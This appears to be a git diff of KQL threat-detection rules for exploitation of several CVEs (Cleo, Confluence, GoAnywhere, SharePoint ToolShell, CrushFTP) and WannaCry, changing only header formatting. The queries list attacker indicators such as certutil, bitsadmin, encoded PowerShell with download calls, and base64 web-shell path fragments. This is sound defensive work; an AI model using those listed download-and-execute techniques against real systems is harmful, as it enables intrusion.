Access/cve_2021_31979_cve_2021_33771_exploits_by_sourgum.kql b/KQL/rules-emerging-threats/Initial Access/cve_2021_31979_cve_2021_33771_exploits_by_sourgum.kql index b13dcffa..712cacbd 100644 --- a/KQL/rules-emerging-threats/Initial Access/cve_2021_31979_cve_2021_33771_exploits_by_sourgum.kql +++ b/KQL/rules-emerging-threats/Initial Access/cve_2021_31979_cve_2021_33771_exploits_by_sourgum.kql @@ -1,12 +1,12 @@ -// Title: CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum -// Author: Sittikorn S -// Date: 2021-07-16 -// Level: critical -// Description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum -// MITRE Tactic: Initial Access -// Tags: attack.initial-access, attack.execution, attack.credential-access, attack.t1566, attack.t1203, cve.2021-33771, cve.2021-31979, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceFileEvents +// Title: CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum +// Author: Sittikorn S +// Date: 2021-07-16 +// Level: critical +// Description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.execution, attack.credential-access, attack.t1566, attack.t1203, cve.2021-33771, cve.2021-31979, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceFileEvents | where FolderPath contains "C:\\Windows\\system32\\physmem.sys" or FolderPath contains "C:\\Windows\\System32\\IME\\IMEJP\\imjpueact.dll" or FolderPath contains "C:\\Windows\\system32\\ime\\IMETC\\IMTCPROT.DLL" or FolderPath contains "C:\\Windows\\system32\\ime\\SHARED\\imecpmeid.dll" or FolderPath contains "C:\\Windows\\system32\\config\\spp\\ServiceState\\Recovery\\pac.dat" or FolderPath contains "C:\\Windows\\system32\\config\\cy-GB\\Setup\\SKB\\InputMethod\\TupTask.dat" or FolderPath contains "C:\\Windows\\system32\\config\\config\\startwus.dat" or FolderPath contains "C:\\Windows\\system32\\ime\\SHARED\\WimBootConfigurations.ini" or FolderPath contains "C:\\Windows\\system32\\ime\\IMEJP\\WimBootConfigurations.ini" or FolderPath contains "C:\\Windows\\system32\\ime\\IMETC\\WimBootConfigurations.ini" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Initial Access/cve_2024_50623_exploitation_attempt_cleo.kql b/KQL/rules-emerging-threats/Initial Access/cve_2024_50623_exploitation_attempt_cleo.kql index aa0f682f..035dfbf2 100644 --- a/KQL/rules-emerging-threats/Initial Access/cve_2024_50623_exploitation_attempt_cleo.kql +++ b/KQL/rules-emerging-threats/Initial Access/cve_2024_50623_exploitation_attempt_cleo.kql @@ -1,12 +1,12 @@ -// Title: CVE-2024-50623 Exploitation Attempt - Cleo -// Author: Tanner Filip, Austin Worline, Chad Hudson, Matt Anderson -// Date: 2024-12-09 -// Level: high -// Description: Detects exploitation attempt of Cleo's CVE-2024-50623 by looking for a "cmd.exe" process spawning from the Celo software suite with suspicious Powershell commandline. -// MITRE Tactic: Initial Access -// Tags: attack.initial-access, attack.execution, attack.t1190, cve.2024-50623, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: CVE-2024-50623 Exploitation Attempt - Cleo +// Author: Tanner Filip, Austin Worline, Chad Hudson, Matt Anderson +// Date: 2024-12-09 +// Level: high +// Description: Detects exploitation attempt of Cleo's CVE-2024-50623 by looking for a "cmd.exe" process spawning from the Celo software suite with suspicious Powershell commandline. +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.execution, attack.t1190, cve.2024-50623, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains "powershell" or ProcessCommandLine contains " -enc " or ProcessCommandLine contains " -EncodedCommand" or ProcessCommandLine contains ".Download") and FolderPath endswith "\\cmd.exe" and (InitiatingProcessCommandLine contains "Harmony" or InitiatingProcessCommandLine contains "lexicom" or InitiatingProcessCommandLine contains "VersaLex" or InitiatingProcessCommandLine contains "VLTrader") and InitiatingProcessFolderPath endswith "\\javaw.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Initial Access/dns_rce_cve_2020_1350.kql b/KQL/rules-emerging-threats/Initial Access/dns_rce_cve_2020_1350.kql index c1d338a1..daaeb3ac 100644 --- a/KQL/rules-emerging-threats/Initial Access/dns_rce_cve_2020_1350.kql +++ b/KQL/rules-emerging-threats/Initial Access/dns_rce_cve_2020_1350.kql @@ -1,12 +1,12 @@ -// Title: DNS RCE CVE-2020-1350 -// Author: Florian Roth (Nextron Systems) -// Date: 2020-07-15 -// Level: critical -// Description: Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process -// MITRE Tactic: Initial Access -// Tags: attack.initial-access, attack.t1190, attack.execution, attack.t1569.002, cve.2020-1350, detection.emerging-threats -// False Positives: -// - Unknown but benign sub processes of the Windows DNS service dns.exe - -DeviceProcessEvents +// Title: DNS RCE CVE-2020-1350 +// Author: Florian Roth (Nextron Systems) +// Date: 2020-07-15 +// Level: critical +// Description: Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1190, attack.execution, attack.t1569.002, cve.2020-1350, detection.emerging-threats +// False Positives: +// - Unknown but benign sub processes of the Windows DNS service dns.exe + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\System32\\dns.exe" and (not((FolderPath endswith "\\System32\\werfault.exe" or FolderPath endswith "\\System32\\conhost.exe" or FolderPath endswith "\\System32\\dnscmd.exe" or FolderPath endswith "\\System32\\dns.exe"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Initial Access/exploited_cve_2020_10189_zoho_manageengine.kql b/KQL/rules-emerging-threats/Initial Access/exploited_cve_2020_10189_zoho_manageengine.kql index 7231aecb..af860080 100644 --- a/KQL/rules-emerging-threats/Initial Access/exploited_cve_2020_10189_zoho_manageengine.kql +++ b/KQL/rules-emerging-threats/Initial Access/exploited_cve_2020_10189_zoho_manageengine.kql @@ -1,10 +1,10 @@ -// Title: Exploited CVE-2020-10189 Zoho ManageEngine -// Author: Florian Roth (Nextron Systems) -// Date: 2020-03-25 -// Level: high -// Description: Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189 -// MITRE Tactic: Initial Access -// Tags: attack.initial-access, attack.t1190, attack.execution, attack.t1059.001, attack.t1059.003, attack.s0190, cve.2020-10189, detection.emerging-threats - -DeviceProcessEvents +// Title: Exploited CVE-2020-10189 Zoho ManageEngine +// Author: Florian Roth (Nextron Systems) +// Date: 2020-03-25 +// Level: high +// Description: Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189 +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1190, attack.execution, attack.t1059.001, attack.t1059.003, attack.s0190, cve.2020-10189, detection.emerging-threats + +DeviceProcessEvents | where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\query.exe") and InitiatingProcessFolderPath endswith "DesktopCentral_Server\\jre\\bin\\java.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Initial Access/potential_atlassian_confluence_cve_2021_26084_exploitation_attempt.kql b/KQL/rules-emerging-threats/Initial Access/potential_atlassian_confluence_cve_2021_26084_exploitation_attempt.kql index 41e21aea..774e5aa8 100644 --- a/KQL/rules-emerging-threats/Initial Access/potential_atlassian_confluence_cve_2021_26084_exploitation_attempt.kql +++ b/KQL/rules-emerging-threats/Initial Access/potential_atlassian_confluence_cve_2021_26084_exploitation_attempt.kql @@ -1,10 +1,10 @@ -// Title: Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt -// Author: Bhabesh Raj -// Date: 2021-09-08 -// Level: high -// Description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084 -// MITRE Tactic: Initial Access -// Tags: attack.initial-access, attack.execution, attack.t1190, attack.t1059, cve.2021-26084, detection.emerging-threats - -DeviceProcessEvents +// Title: Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt +// Author: Bhabesh Raj +// Date: 2021-09-08 +// Level: high +// Description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084 +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.execution, attack.t1190, attack.t1059, cve.2021-26084, detection.emerging-threats + +DeviceProcessEvents | where (ProcessCommandLine contains "certutil" or ProcessCommandLine contains "cmd /c" or ProcessCommandLine contains "cmd /k" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "curl" or ProcessCommandLine contains "ipconfig" or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "pwsh" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "whoami" or ProcessCommandLine contains "wscript") and InitiatingProcessFolderPath endswith "\\Atlassian\\Confluence\\jre\\bin\\java.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Initial Access/potential_cve_2021_44228_exploitation_attempt_vmware_horizon.kql b/KQL/rules-emerging-threats/Initial Access/potential_cve_2021_44228_exploitation_attempt_vmware_horizon.kql index b6f58511..583e70d8 100644 --- a/KQL/rules-emerging-threats/Initial Access/potential_cve_2021_44228_exploitation_attempt_vmware_horizon.kql +++ b/KQL/rules-emerging-threats/Initial Access/potential_cve_2021_44228_exploitation_attempt_vmware_horizon.kql @@ -1,12 +1,12 @@ -// Title: Potential CVE-2021-44228 Exploitation Attempt - VMware Horizon -// Author: @kostastsale -// Date: 2022-01-14 -// Level: high -// Description: Detects potential initial exploitation attempts against VMware Horizon deployments running a vulnerable versions of Log4j. -// MITRE Tactic: Initial Access -// Tags: attack.initial-access, attack.t1190, cve.2021-44228, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Potential CVE-2021-44228 Exploitation Attempt - VMware Horizon +// Author: @kostastsale +// Date: 2022-01-14 +// Level: high +// Description: Detects potential initial exploitation attempts against VMware Horizon deployments running a vulnerable versions of Log4j. +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1190, cve.2021-44228, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\ws_TomcatService.exe" and (not((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Initial Access/potential_cve_2022_26809_exploitation_attempt.kql b/KQL/rules-emerging-threats/Initial Access/potential_cve_2022_26809_exploitation_attempt.kql index 7038bf52..3249ce87 100644 --- a/KQL/rules-emerging-threats/Initial Access/potential_cve_2022_26809_exploitation_attempt.kql +++ b/KQL/rules-emerging-threats/Initial Access/potential_cve_2022_26809_exploitation_attempt.kql @@ -1,12 +1,12 @@ -// Title: Potential CVE-2022-26809 Exploitation Attempt -// Author: Florian Roth (Nextron Systems) -// Date: 2022-04-13 -// Level: high -// Description: Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809) -// MITRE Tactic: Initial Access -// Tags: attack.initial-access, attack.t1190, attack.execution, attack.t1569.002, cve.2022-26809, detection.emerging-threats -// False Positives: -// - Some cases in which the service spawned a werfault.exe process - -DeviceProcessEvents +// Title: Potential CVE-2022-26809 Exploitation Attempt +// Author: Florian Roth (Nextron Systems) +// Date: 2022-04-13 +// Level: high +// Description: Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809) +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1190, attack.execution, attack.t1569.002, cve.2022-26809, detection.emerging-threats +// False Positives: +// - Some cases in which the service spawned a werfault.exe process + +DeviceProcessEvents | where InitiatingProcessCommandLine contains "-k RPCSS" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\svchost.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Initial Access/potential_exploitation_attempt_of_undocumented_windowsserver_rce.kql b/KQL/rules-emerging-threats/Initial Access/potential_exploitation_attempt_of_undocumented_windowsserver_rce.kql index 90f0939d..34ece3d8 100644 --- a/KQL/rules-emerging-threats/Initial Access/potential_exploitation_attempt_of_undocumented_windowsserver_rce.kql +++ b/KQL/rules-emerging-threats/Initial Access/potential_exploitation_attempt_of_undocumented_windowsserver_rce.kql @@ -1,10 +1,10 @@ -// Title: Potential Exploitation Attempt Of Undocumented WindowsServer RCE -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali -// Date: 2023-01-21 -// Level: high -// Description: Detects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE) -// MITRE Tactic: Initial Access -// Tags: attack.initial-access, attack.t1190, detection.emerging-threats - -DeviceProcessEvents +// Title: Potential Exploitation Attempt Of Undocumented WindowsServer RCE +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali +// Date: 2023-01-21 +// Level: high +// Description: Detects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE) +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1190, detection.emerging-threats + +DeviceProcessEvents | where ProcessCommandLine contains "-k DHCPServer" and FolderPath endswith "\\svchost.exe" and InitiatingProcessCommandLine contains "-k DHCPServer" and InitiatingProcessFolderPath endswith "\\svchost.exe" and (AccountName contains "NETWORK SERVICE" or AccountName contains "NETZWERKDIENST" or AccountName contains "SERVIZIO DI RETE" or AccountName contains "SERVICIO DE RED") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Initial Access/potential_exploitation_of_goanywhere_mft_vulnerability.kql b/KQL/rules-emerging-threats/Initial Access/potential_exploitation_of_goanywhere_mft_vulnerability.kql index e15251a5..d330dbb9 100644 --- a/KQL/rules-emerging-threats/Initial Access/potential_exploitation_of_goanywhere_mft_vulnerability.kql +++ b/KQL/rules-emerging-threats/Initial Access/potential_exploitation_of_goanywhere_mft_vulnerability.kql @@ -1,13 +1,13 @@ -// Title: Potential Exploitation of GoAnywhere MFT Vulnerability -// Author: MSFT (idea), Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-10-07 -// Level: high -// Description: Detects suspicious command execution by child processes of the GoAnywhere Managed File Transfer (MFT) application, which may indicate exploitation such as CVE-2025-10035. -// This behavior is indicative of post-exploitation activity related to CVE-2025-10035, as observed in campaigns by the threat actor Storm-1175. -// MITRE Tactic: Initial Access -// Tags: attack.initial-access, attack.t1190, attack.execution, attack.t1059.001, attack.persistence, attack.t1133, detection.emerging-threats, cve.2025-10035 -// False Positives: -// - Legitimate administrative scripts or built-in GoAnywhere functions could potentially trigger this rule. Tuning may be required based on normal activity in your environment. - -DeviceProcessEvents +// Title: Potential Exploitation of GoAnywhere MFT Vulnerability +// Author: MSFT (idea), Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-10-07 +// Level: high +// Description: Detects suspicious command execution by child processes of the GoAnywhere Managed File Transfer (MFT) application, which may indicate exploitation such as CVE-2025-10035. +// This behavior is indicative of post-exploitation activity related to CVE-2025-10035, as observed in campaigns by the threat actor Storm-1175. +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1190, attack.execution, attack.t1059.001, attack.persistence, attack.t1133, detection.emerging-threats, cve.2025-10035 +// False Positives: +// - Legitimate administrative scripts or built-in GoAnywhere functions could potentially trigger this rule. Tuning may be required based on normal activity in your environment. + +DeviceProcessEvents | where InitiatingProcessFolderPath contains "\\GoAnywhere\\tomcat\\" and ((((ProcessCommandLine contains "IEX" and ProcessCommandLine contains "enc" and ProcessCommandLine contains "Hidden" and ProcessCommandLine contains "bypass") or (ProcessCommandLine matches regex "net\\s+user" or ProcessCommandLine matches regex "net\\s+group" or ProcessCommandLine matches regex "query\\s+session") or (ProcessCommandLine contains "whoami" or ProcessCommandLine contains "systeminfo" or ProcessCommandLine contains "dsquery" or ProcessCommandLine contains "localgroup administrators" or ProcessCommandLine contains "nltest" or ProcessCommandLine contains "samaccountname=" or ProcessCommandLine contains "adscredentials" or ProcessCommandLine contains "o365accountconfiguration" or ProcessCommandLine contains ".DownloadString(" or ProcessCommandLine contains ".DownloadFile(" or ProcessCommandLine contains "FromBase64String(" or ProcessCommandLine contains "System.IO.Compression" or ProcessCommandLine contains "System.IO.MemoryStream" or ProcessCommandLine contains "curl")) and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe")) or (((ProcessCommandLine contains "powershell" or ProcessCommandLine contains "whoami" or ProcessCommandLine contains "net.exe" or ProcessCommandLine contains "net1.exe" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "quser" or ProcessCommandLine contains "nltest" or ProcessCommandLine contains "curl") and FolderPath endswith "\\cmd.exe") or (ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "wscript"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_file_create.kql b/KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_file_create.kql index 0beb7cdb..efdc47dd 100644 --- a/KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_file_create.kql +++ b/KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_file_create.kql @@ -1,11 +1,11 @@ -// Title: Potential SharePoint ToolShell CVE-2025-53770 Exploitation - File Create -// Author: Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-07-21 -// Level: critical -// Description: Detects the creation of file such as spinstall0.aspx which may indicate successful exploitation of CVE-2025-53770. -// CVE-2025-53770 is a zero-day vulnerability in SharePoint that allows remote code execution. -// MITRE Tactic: Initial Access -// Tags: attack.initial-access, attack.t1190, cve.2025-53770, detection.emerging-threats - -DeviceFileEvents +// Title: Potential SharePoint ToolShell CVE-2025-53770 Exploitation - File Create +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-07-21 +// Level: critical +// Description: Detects the creation of file such as spinstall0.aspx which may indicate successful exploitation of CVE-2025-53770. +// CVE-2025-53770 is a zero-day vulnerability in SharePoint that allows remote code execution. +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1190, cve.2025-53770, detection.emerging-threats + +DeviceFileEvents | where (FolderPath contains "\\15\\TEMPLATE\\LAYOUTS\\" or FolderPath contains "\\16\\TEMPLATE\\LAYOUTS\\") and (FolderPath endswith "\\spinstall.aspx" or (FolderPath contains "\\spinstall" and FolderPath contains ".aspx") or FolderPath endswith "\\debug_dev.js") and (FolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\" or FolderPath startswith "C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\Web Server Extensions\\") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_indicators.kql b/KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_indicators.kql index 94159740..138d6269 100644 --- a/KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_indicators.kql +++ b/KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_indicators.kql @@ -1,11 +1,11 @@ -// Title: Potential SharePoint ToolShell CVE-2025-53770 Exploitation Indicators -// Author: Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-07-21 -// Level: high -// Description: Detects potential exploitation of CVE-2025-53770 by identifying indicators such as suspicious command lines discovered in Post-Exploitation activities. -// CVE-2025-53770 is a zero-day vulnerability in SharePoint that allows remote code execution. -// MITRE Tactic: Initial Access -// Tags: attack.initial-access, attack.t1190, cve.2025-53770, detection.emerging-threats - -DeviceProcessEvents +// Title: Potential SharePoint ToolShell CVE-2025-53770 Exploitation Indicators +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-07-21 +// Level: high +// Description: Detects potential exploitation of CVE-2025-53770 by identifying indicators such as suspicious command lines discovered in Post-Exploitation activities. +// CVE-2025-53770 is a zero-day vulnerability in SharePoint that allows remote code execution. +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1190, cve.2025-53770, detection.emerging-threats + +DeviceProcessEvents | where (InitiatingProcessFolderPath endswith "\\w3wp.exe" and ((ProcessCommandLine contains "cwBwAGkAbgBzAHQAYQBsAGwAMAAuAGEAcwBwAHgA" or ProcessCommandLine contains "MAcABpAG4AcwB0AGEAbABsADAALgBhAHMAcAB4A" or ProcessCommandLine contains "zAHAAaQBuAHMAdABhAGwAbAAwAC4AYQBzAHAAeA" or ProcessCommandLine contains "c3BpbnN0YWxsMC5hc3B4") or (ProcessCommandLine contains "OgBcAFAAUgBPAEcAUgBBAH4AMQBcAEMATwBNAE0ATwBOAH4AMQBcAE0ASQBDAFIATwBTAH4AMQBcAFcARQBCAFMARQBSAH4AMQBcADEANQBcAFQARQBNAFAATABBAFQARQBcAEwAQQBZAE8AVQBUAFMA" or ProcessCommandLine contains "oAXABQAFIATwBHAFIAQQB+ADEAXABDAE8ATQBNAE8ATgB+ADEAXABNAEkAQwBSAE8AUwB+ADEAXABXAEUAQgBTAEUAUgB+ADEAXAAxADUAXABUAEUATQBQAEwAQQBUAEUAXABMAEEAWQBPAFUAVABTA" or ProcessCommandLine contains "6AFwAUABSAE8ARwBSAEEAfgAxAFwAQwBPAE0ATQBPAE4AfgAxAFwATQBJAEMAUgBPAFMAfgAxAFwAVwBFAEIAUwBFAFIAfgAxAFwAMQA1AFwAVABFAE0AUABMAEEAVABFAFwATABBAFkATwBVAFQAUw" or ProcessCommandLine contains "OgBcAFAAUgBPAEcAUgBBAH4AMQBcAEMATwBNAE0ATwBOAH4AMQBcAE0ASQBDAFIATwBTAH4AMQBcAFcARQBCAFMARQBSAH4AMQBcADEANgBcAFQARQBNAFAATABBAFQARQBcAEwAQQBZAE8AVQBUAFMA" or ProcessCommandLine contains "oAXABQAFIATwBHAFIAQQB+ADEAXABDAE8ATQBNAE8ATgB+ADEAXABNAEkAQwBSAE8AUwB+ADEAXABXAEUAQgBTAEUAUgB+ADEAXAAxADYAXABUAEUATQBQAEwAQQBUAEUAXABMAEEAWQBPAFUAVABTA" or ProcessCommandLine contains "6AFwAUABSAE8ARwBSAEEAfgAxAFwAQwBPAE0ATQBPAE4AfgAxAFwATQBJAEMAUgBPAFMAfgAxAFwAVwBFAEIAUwBFAFIAfgAxAFwAMQA2AFwAVABFAE0AUABMAEEAVABFAFwATABBAFkATwBVAFQAUw" or ProcessCommandLine contains "OgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABDAG8AbQBtAG8AbgAgAEYAaQBsAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0ACAAUwBoAGEAcgBlAGQAXABXAGUAYgAgAFMAZQByAHYAZQByACAARQB4AHQAZQBuAHMAaQBvAG4AcwBcADEANQBcAFQARQBNAFAATABBAFQARQBcAEwAQQBZAE8AVQBUAFMA" or ProcessCommandLine contains "oAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwAQwBvAG0AbQBvAG4AIABGAGkAbABlAHMAXABNAGkAYwByAG8AcwBvAGYAdAAgAFMAaABhAHIAZQBkAFwAVwBlAGIAIABTAGUAcgB2AGUAcgAgAEUAeAB0AGUAbgBzAGkAbwBuAHMAXAAxADUAXABUAEUATQBQAEwAQQBUAEUAXABMAEEAWQBPAFUAVABTA" or ProcessCommandLine contains "6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAEMAbwBtAG0AbwBuACAARgBpAGwAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAIABTAGgAYQByAGUAZABcAFcAZQBiACAAUwBlAHIAdgBlAHIAIABFAHgAdABlAG4AcwBpAG8AbgBzAFwAMQA1AFwAVABFAE0AUABMAEEAVABFAFwATABBAFkATwBVAFQAUw" or ProcessCommandLine contains "OgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABDAG8AbQBtAG8AbgAgAEYAaQBsAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0ACAAUwBoAGEAcgBlAGQAXABXAGUAYgAgAFMAZQByAHYAZQByACAARQB4AHQAZQBuAHMAaQBvAG4AcwBcADEANgBcAFQARQBNAFAATABBAFQARQBcAEwAQQBZAE8AVQBUAFMA" or ProcessCommandLine contains "oAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwAQwBvAG0AbQBvAG4AIABGAGkAbABlAHMAXABNAGkAYwByAG8AcwBvAGYAdAAgAFMAaABhAHIAZQBkAFwAVwBlAGIAIABTAGUAcgB2AGUAcgAgAEUAeAB0AGUAbgBzAGkAbwBuAHMAXAAxADYAXABUAEUATQBQAEwAQQBUAEUAXABMAEEAWQBPAFUAVABTA" or ProcessCommandLine contains "6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAEMAbwBtAG0AbwBuACAARgBpAGwAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAIABTAGgAYQByAGUAZABcAFcAZQBiACAAUwBlAHIAdgBlAHIAIABFAHgAdABlAG4AcwBpAG8AbgBzAFwAMQA2AFwAVABFAE0AUABMAEEAVABFAFwATABBAFkATwBVAFQAUw"))) or (ProcessCommandLine contains "-EncodedCommand JABiAGEAcwBlADYANABTAHQAcgBpAG4AZwAgAD0" or ProcessCommandLine contains "TEMPLATE\\LAYOUTS\\spinstall0.aspx") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Initial Access/suspicious_crushftp_child_process.kql b/KQL/rules-emerging-threats/Initial Access/suspicious_crushftp_child_process.kql index b291ca19..803f6d95 100644 --- a/KQL/rules-emerging-threats/Initial Access/suspicious_crushftp_child_process.kql +++ b/KQL/rules-emerging-threats/Initial Access/suspicious_crushftp_child_process.kql @@ -1,15 +1,15 @@ -// Title: Suspicious CrushFTP Child Process -// Author: Craig Sweeney, Matt Anderson, Jose Oregon, Tim Kasper, Faith Stratton, Samantha Shaw, Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-04-10 -// Level: medium -// Description: Detects suspicious child processes spawned by the CrushFTP service that may indicate exploitation of remote code execution vulnerabilities such as -// CVE-2025-31161, where attackers can achieve RCE through crafted HTTP requests. -// The detection focuses on commonly abused Windows executables (like powershell.exe, cmd.exe etc.) that attackers typically use post-exploitation to execute malicious commands. -// MITRE Tactic: Initial Access -// Tags: attack.initial-access, attack.execution, attack.t1059.001, attack.t1059.003, attack.t1190, cve.2025-31161, detection.emerging-threats -// False Positives: -// - Legitimate CrushFTP administrative actions -// - Software updates - -DeviceProcessEvents +// Title: Suspicious CrushFTP Child Process +// Author: Craig Sweeney, Matt Anderson, Jose Oregon, Tim Kasper, Faith Stratton, Samantha Shaw, Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-04-10 +// Level: medium +// Description: Detects suspicious child processes spawned by the CrushFTP service that may indicate exploitation of remote code execution vulnerabilities such as +// CVE-2025-31161, where attackers can achieve RCE through crafted HTTP requests. +// The detection focuses on commonly abused Windows executables (like powershell.exe, cmd.exe etc.) that attackers typically use post-exploitation to execute malicious commands. +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.execution, attack.t1059.001, attack.t1059.003, attack.t1190, cve.2025-31161, detection.emerging-threats +// False Positives: +// - Legitimate CrushFTP administrative actions +// - Software updates + +DeviceProcessEvents | where (FolderPath endswith "\\bash.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\crushftpservice.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Lateral Movement/wannacry_ransomware_activity.kql b/KQL/rules-emerging-threats/Lateral Movement/wannacry_ransomware_activity.kql index fed91862..beaad77c 100644 --- a/KQL/rules-emerging-threats/Lateral Movement/wannacry_ransomware_activity.kql +++ b/KQL/rules-emerging-threats/Lateral Movement/wannacry_ransomware_activity.kql @@ -1,10 +1,10 @@ -// Title: WannaCry Ransomware Activity -// Author: Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro -// Date: 2019-01-16 -// Level: critical -// Description: Detects WannaCry ransomware activity -// MITRE Tactic: Lateral Movement -// Tags: attack.lateral-movement, attack.t1210, attack.discovery, attack.t1083, attack.defense-evasion, attack.t1222.001, attack.impact, attack.t1486, attack.t1490, detection.emerging-threats - -DeviceProcessEvents +// Title: WannaCry Ransomware Activity +// Author: Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro +// Date: 2019-01-16 +// Level: critical +// Description: Detects WannaCry ransomware activity +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1210, attack.discovery, attack.t1083, attack.defense-evasion, attack.t1222.001, attack.impact, attack.t1486, attack.t1490, detection.emerging-threats + 